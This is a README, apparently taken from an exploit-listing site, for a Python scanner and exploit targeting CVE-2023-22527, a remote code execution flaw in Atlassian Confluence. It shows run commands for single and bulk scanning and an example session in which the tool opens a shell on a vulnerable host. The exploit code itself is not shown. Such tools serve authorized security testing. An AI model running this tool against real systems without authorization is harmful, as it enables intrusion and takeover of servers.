## https://sploitus.com/exploit?id=BD6E5E50-E5E8-5FBB-8D0C-F9DD7FCDDFAE
# Atlassian Confluence CVE-2023-22527 Scanner ๐ก๏ธ
## Overview ๐
This tool scans for the CVE-2023-22527 vulnerability in Atlassian Confluence, a critical RCE flaw allowing unauthorized remote code execution.
## Features ๐
- **Single URL Scan**: Scan a specific target for the vulnerability.
- **Bulk Scan**: Process multiple URLs from a file for efficient vulnerability assessment.
- **Concurrency Control**: Utilize threading for faster bulk scanning.
- **Output Logging**: Save vulnerable URLs to a specified file.
## Usage ๐ป
1. **Single URL Scan**: `python exploit.py -u <URL>`
2. **Bulk Scan**: `python exploit.py -f <file_path>`
3. **Set Threads**: `python exploit.py -t <number_of_threads>`
4. **Output File**: `python exploit.py -o <output_file_path>`
## Requirements ๐
- Python 3.10+
- Dependencies: `requests`, `prompt_toolkit`, `rich`, `alive_progress`
## Installation ๐ ๏ธ
1. Clone the repository: `git clone https://github.com/Chocapikk/CVE-2023-22527`
2. Install dependencies: `pip install -r requirements.txt`
## Example ๐
```bash
$ python3 exploit.py -u http://localhost:8092
[+] http://localhost:8092 is vulnerable - confluence
[!] Shell is ready, please type your commands UwU
$ id
uid=2002(confluence) gid=2002(confluence) groups=2002(confluence),0(root)
$ pwd
/var/atlassian/application-data/confluence
$ hostname
ff7bfe2e7109
```
## Disclaimer โ ๏ธ
This tool is intended for security research and should only be used on systems with explicit authorization. Misuse may lead to legal consequences.
## More Information ๐
For more detailed information about the CVE-2023-22527 vulnerability, refer to the [Project Discovery Blog Post](https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/).